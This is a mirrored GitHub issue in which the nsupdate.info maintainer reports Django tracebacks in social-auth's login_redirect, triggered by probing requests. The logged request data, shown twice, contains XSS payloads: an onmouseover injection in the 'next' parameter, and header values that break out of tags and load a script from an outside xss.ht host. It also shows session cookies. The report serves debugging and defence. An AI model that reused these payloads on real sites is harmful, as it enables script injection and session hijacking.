[GH-ISSUE #334] traceback in login_redirect #259

New issue

Closed

opened 2026-02-26 09:37:01 +03:00 by kerem · 2 comments

kerem commented 2026-02-26 09:37:01 +03:00

Owner

Copy link

Originally created by @ThomasWaldmann on GitHub (Apr 10, 2018).
Original GitHub issue: https://github.com/nsupdate-info/nsupdate.info/issues/334

Looks like someone is trying to do nasty stuff, triggering tracebacks:

Internal Server Error: /admin/login/
Traceback (most recent call last):
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/core/handlers/base.py", line 164, in get_response
    response = response.render()
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/response.py", line 158, in render
    self.content = self.rendered_content
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/response.py", line 135, in rendered_content
    content = template.render(context, self._request)
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/backends/django.py", line 74, in render
    return self.template.render(context)
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/base.py", line 209, in render
    with context.bind_template(self):
  File "/usr/lib/python2.7/contextlib.py", line 17, in __enter__
    return self.gen.next()
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/context.py", line 241, in bind_template
    updates.update(processor(self.request))
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/social_django/context_processors.py", line 44, in login_redirect
    value = quote(value)
  File "/usr/lib/python2.7/urllib.py", line 1294, in quote
    return ''.join(map(quoter, s))
KeyError: u'\xf6'

Request repr(): 
<WSGIRequest
path:/admin/login/,
GET:<QueryDict: {u'next': [u'\xf6" onmouseover=tA78(9213) //']}>,
POST:<QueryDict: {}>,
COOKIES:{'csrftoken': 'iAjcPRh2v5eq2TXmjPxPmsXjwEUE0gjE',
 'sessionid': 'zs1eosgtbj4vgol2zpo9yea7bvi2bn84'},
META:{'CONTENT_LENGTH': '',
 'CONTENT_TYPE': '',
 u'CSRF_COOKIE': u'iAjcPRh2v5eq2TXmjPxPmsXjwEUE0gjE',
 'HTTP_ACCEPT': '*/*',
 'HTTP_ACCEPT_ENCODING': 'gzip,deflate',
 'HTTP_CONNECTION': 'close',
 'HTTP_COOKIE': 'sessionid=zs1eosgtbj4vgol2zpo9yea7bvi2bn84; csrftoken=iAjcPRh2v5eq2TXmjPxPmsXjwEUE0gjE',
 'HTTP_HOST': 'www.nsupdate.info',
 'HTTP_REFERER': 'https://www.nsupdate.info',
 'HTTP_USER_AGENT': '\'>"></title></style></textarea></script>"><script src=https://ulala.xss.ht></script>',
 'HTTP_X_FORWARDED_FOR': '1, 193.90.12.118',
 'HTTP_X_FORWARDED_PROTO': 'https',
 'HTTP_X_ORIGHOST': '\'>"></title></style></textarea></script>"><script src=https://ulala.xss.ht></script>',
 'HTTP_X_REAL_IP': '193.90.12.118',
 'PATH_INFO': u'/admin/login/',
 'QUERY_STRING': 'next=%f6%22%20onmouseover%3dtA78(9213)%20//',
 'REMOTE_ADDR': '193.90.12.118',
 'REMOTE_PORT': '',
 'REQUEST_METHOD': 'GET',
 'REQUEST_URI': '/admin/login/?next=%f6%22%20onmouseover%3dtA78(9213)%20//',
 u'SCRIPT_NAME': u'',
 'SERVER_NAME': 'www.nsupdate.info',
 'SERVER_PORT': '80',
 'SERVER_PROTOCOL': 'HTTP/1.0',
}>

Internal Server Error: /accounts/login/
Traceback (most recent call last):
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/core/handlers/base.py", line 164, in get_response
    response = response.render()
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/response.py", line 158, in render
    self.content = self.rendered_content
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/response.py", line 135, in rendered_content
    content = template.render(context, self._request)
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/backends/django.py", line 74, in render
    return self.template.render(context)
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/base.py", line 209, in render
    with context.bind_template(self):
  File "/usr/lib/python2.7/contextlib.py", line 17, in __enter__
    return self.gen.next()
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/context.py", line 241, in bind_template
    updates.update(processor(self.request))
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/social_django/context_processors.py", line 44, in login_redirect
    value = quote(value)
  File "/usr/lib/python2.7/urllib.py", line 1294, in quote
    return ''.join(map(quoter, s))
KeyError: u'\xf0'

Request repr(): 
<WSGIRequest
path:/accounts/login/,
GET:<QueryDict: {u'next': [u'\xf0\'\'\xf0""']}>,
POST:<QueryDict: {}>,
COOKIES:{'csrftoken': 'iAjcPRh2v5eq2TXmjPxPmsXjwEUE0gjE',
 'sessionid': 'zs1eosgtbj4vgol2zpo9yea7bvi2bn84'},
META:{'CONTENT_LENGTH': '',
 'CONTENT_TYPE': '',
 u'CSRF_COOKIE': u'iAjcPRh2v5eq2TXmjPxPmsXjwEUE0gjE',
 'DOCUMENT_ROOT': '/srv/nsupdate.info/htdocs',
 'HTTP_ACCEPT': '*/*',
 'HTTP_ACCEPT_ENCODING': 'gzip,deflate',
 'HTTP_CONNECTION': 'close',
 'HTTP_COOKIE': 'sessionid=zs1eosgtbj4vgol2zpo9yea7bvi2bn84; csrftoken=iAjcPRh2v5eq2TXmjPxPmsXjwEUE0gjE',
 'HTTP_HOST': 'www.nsupdate.info',
 'HTTP_REFERER': 'https://www.nsupdate.info',
 'HTTP_USER_AGENT': '\'>"></title></style></textarea></script>"><script src=https://ulala.xss.ht></script>',
 'HTTP_X_FORWARDED_FOR': '1, 185.38.14.171',
 'HTTP_X_FORWARDED_PROTO': 'https',
 'HTTP_X_ORIGHOST': '\'>"></title></style></textarea></script>"><script src=https://ulala.xss.ht></script>',
 'HTTP_X_REAL_IP': '185.38.14.171',
 'PATH_INFO': u'/accounts/login/',
 'QUERY_STRING': "next=%f0''%f0%22%22",
 'REMOTE_ADDR': '185.38.14.171',
 'REMOTE_PORT': '',
 'REQUEST_METHOD': 'GET',
 'REQUEST_URI': "/accounts/login/?next=%f0''%f0%22%22",
 u'SCRIPT_NAME': u'',
 'SERVER_NAME': 'www.nsupdate.info',
 'SERVER_PORT': '80',
 'SERVER_PROTOCOL': 'HTTP/1.0',
}>

Originally created by @ThomasWaldmann on GitHub (Apr 10, 2018). Original GitHub issue: https://github.com/nsupdate-info/nsupdate.info/issues/334 Looks like someone is trying to do nasty stuff, triggering tracebacks: ``` Internal Server Error: /admin/login/ Traceback (most recent call last): File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/core/handlers/base.py", line 164, in get_response response = response.render() File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/response.py", line 158, in render self.content = self.rendered_content File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/response.py", line 135, in rendered_content content = template.render(context, self._request) File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/backends/django.py", line 74, in render return self.template.render(context) File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/base.py", line 209, in render with context.bind_template(self): File "/usr/lib/python2.7/contextlib.py", line 17, in __enter__ return self.gen.next() File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/context.py", line 241, in bind_template updates.update(processor(self.request)) File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/social_django/context_processors.py", line 44, in login_redirect value = quote(value) File "/usr/lib/python2.7/urllib.py", line 1294, in quote return ''.join(map(quoter, s)) KeyError: u'\xf6' Request repr(): <WSGIRequest path:/admin/login/, GET:<QueryDict: {u'next': [u'\xf6" onmouseover=tA78(9213) //']}>, POST:<QueryDict: {}>, COOKIES:{'csrftoken': 'iAjcPRh2v5eq2TXmjPxPmsXjwEUE0gjE', 'sessionid': 'zs1eosgtbj4vgol2zpo9yea7bvi2bn84'}, META:{'CONTENT_LENGTH': '', 'CONTENT_TYPE': '', u'CSRF_COOKIE': u'iAjcPRh2v5eq2TXmjPxPmsXjwEUE0gjE', 'HTTP_ACCEPT': '*/*', 'HTTP_ACCEPT_ENCODING': 'gzip,deflate', 'HTTP_CONNECTION': 'close', 'HTTP_COOKIE': 'sessionid=zs1eosgtbj4vgol2zpo9yea7bvi2bn84; csrftoken=iAjcPRh2v5eq2TXmjPxPmsXjwEUE0gjE', 'HTTP_HOST': 'www.nsupdate.info', 'HTTP_REFERER': 'https://www.nsupdate.info', 'HTTP_USER_AGENT': '\'>"></title></style></textarea></script>"><script src=https://ulala.xss.ht></script>', 'HTTP_X_FORWARDED_FOR': '1, 193.90.12.118', 'HTTP_X_FORWARDED_PROTO': 'https', 'HTTP_X_ORIGHOST': '\'>"></title></style></textarea></script>"><script src=https://ulala.xss.ht></script>', 'HTTP_X_REAL_IP': '193.90.12.118', 'PATH_INFO': u'/admin/login/', 'QUERY_STRING': 'next=%f6%22%20onmouseover%3dtA78(9213)%20//', 'REMOTE_ADDR': '193.90.12.118', 'REMOTE_PORT': '', 'REQUEST_METHOD': 'GET', 'REQUEST_URI': '/admin/login/?next=%f6%22%20onmouseover%3dtA78(9213)%20//', u'SCRIPT_NAME': u'', 'SERVER_NAME': 'www.nsupdate.info', 'SERVER_PORT': '80', 'SERVER_PROTOCOL': 'HTTP/1.0', }> ``` ``` Internal Server Error: /accounts/login/ Traceback (most recent call last): File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/core/handlers/base.py", line 164, in get_response response = response.render() File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/response.py", line 158, in render self.content = self.rendered_content File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/response.py", line 135, in rendered_content content = template.render(context, self._request) File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/backends/django.py", line 74, in render return self.template.render(context) File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/base.py", line 209, in render with context.bind_template(self): File "/usr/lib/python2.7/contextlib.py", line 17, in __enter__ return self.gen.next() File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/context.py", line 241, in bind_template updates.update(processor(self.request)) File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/social_django/context_processors.py", line 44, in login_redirect value = quote(value) File "/usr/lib/python2.7/urllib.py", line 1294, in quote return ''.join(map(quoter, s)) KeyError: u'\xf0' Request repr(): <WSGIRequest path:/accounts/login/, GET:<QueryDict: {u'next': [u'\xf0\'\'\xf0""']}>, POST:<QueryDict: {}>, COOKIES:{'csrftoken': 'iAjcPRh2v5eq2TXmjPxPmsXjwEUE0gjE', 'sessionid': 'zs1eosgtbj4vgol2zpo9yea7bvi2bn84'}, META:{'CONTENT_LENGTH': '', 'CONTENT_TYPE': '', u'CSRF_COOKIE': u'iAjcPRh2v5eq2TXmjPxPmsXjwEUE0gjE', 'DOCUMENT_ROOT': '/srv/nsupdate.info/htdocs', 'HTTP_ACCEPT': '*/*', 'HTTP_ACCEPT_ENCODING': 'gzip,deflate', 'HTTP_CONNECTION': 'close', 'HTTP_COOKIE': 'sessionid=zs1eosgtbj4vgol2zpo9yea7bvi2bn84; csrftoken=iAjcPRh2v5eq2TXmjPxPmsXjwEUE0gjE', 'HTTP_HOST': 'www.nsupdate.info', 'HTTP_REFERER': 'https://www.nsupdate.info', 'HTTP_USER_AGENT': '\'>"></title></style></textarea></script>"><script src=https://ulala.xss.ht></script>', 'HTTP_X_FORWARDED_FOR': '1, 185.38.14.171', 'HTTP_X_FORWARDED_PROTO': 'https', 'HTTP_X_ORIGHOST': '\'>"></title></style></textarea></script>"><script src=https://ulala.xss.ht></script>', 'HTTP_X_REAL_IP': '185.38.14.171', 'PATH_INFO': u'/accounts/login/', 'QUERY_STRING': "next=%f0''%f0%22%22", 'REMOTE_ADDR': '185.38.14.171', 'REMOTE_PORT': '', 'REQUEST_METHOD': 'GET', 'REQUEST_URI': "/accounts/login/?next=%f0''%f0%22%22", u'SCRIPT_NAME': u'', 'SERVER_NAME': 'www.nsupdate.info', 'SERVER_PORT': '80', 'SERVER_PROTOCOL': 'HTTP/1.0', }> ```

kerem closed this issue 2026-02-26 09:37:01 +03:00

kerem commented 2026-02-26 09:37:02 +03:00

Author

Owner

Copy link

@ThomasWaldmann commented on GitHub (Sep 30, 2018):

bug in social-auth?

<!-- gh-comment-id:425752996 --> @ThomasWaldmann commented on GitHub (Sep 30, 2018): bug in social-auth?

kerem commented 2026-02-26 09:37:02 +03:00

Author

Owner

Copy link

@ThomasWaldmann commented on GitHub (Oct 1, 2018):

someone doing xss checking / hacking.

<!-- gh-comment-id:425943343 --> @ThomasWaldmann commented on GitHub (Oct 1, 2018): someone doing xss checking / hacking.

kerem referenced this issue 2026-02-26 10:31:29 +03:00

[PR #272] [MERGED] update OpenWrt config example for Chaos Calmer, fixes #259 #436

Sign in to join this conversation.

No Branch/Tag specified

Branches Tags

master

0.13-maint

rel0.10

rel0.9

rel0.8

0.13.0

0.12.0

v0.11.0

v0.10.0

v0.9.1

v0.9.0

v0.8.0

v0.7.0

v0.6.0

v0.5.0

v0.4.0

v0.3.0

v0.2.0b0

djangodash2013

Labels

Clear labels   

bug

  

bug

  

duplicate

  

easy

  

easy

  

enhancement

  

enhancement

  

invalid

  

needs help

  

pull-request

Mirrored from GitHub Pull Request

  

scalability

  

security

  

task

  

urgent

  

wontfix

No labels

bug

bug

duplicate

easy

easy

enhancement

enhancement

invalid

needs help

pull-request

scalability

security

task

urgent

wontfix

Milestone

Clear milestone

No items

No milestone

Projects

Clear projects

No items

No project

Assignees

Clear assignees

No assignees

1 participant

Notifications

Subscribe

Due date

The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference

starred/nsupdate.info-nsupdate-info#259

No description provided.